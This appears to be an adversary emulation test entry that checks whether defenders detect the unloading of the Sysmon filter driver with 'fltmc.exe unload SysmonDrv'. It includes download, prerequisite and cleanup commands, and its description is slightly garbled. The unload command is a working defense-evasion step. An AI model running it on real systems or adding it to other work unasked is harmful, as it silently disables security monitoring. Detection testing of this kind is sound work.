#TechniqueName: Impair Defenses: Disable or Modify Tools
#AtomicTestName: Unload Sysmon Filter Driver
#Description: Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,&run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".&
#Language: cmd

#get_prereq_commands
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force


#commands
fltmc.exe unload SysmonDrv


#cleanup_commands
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1

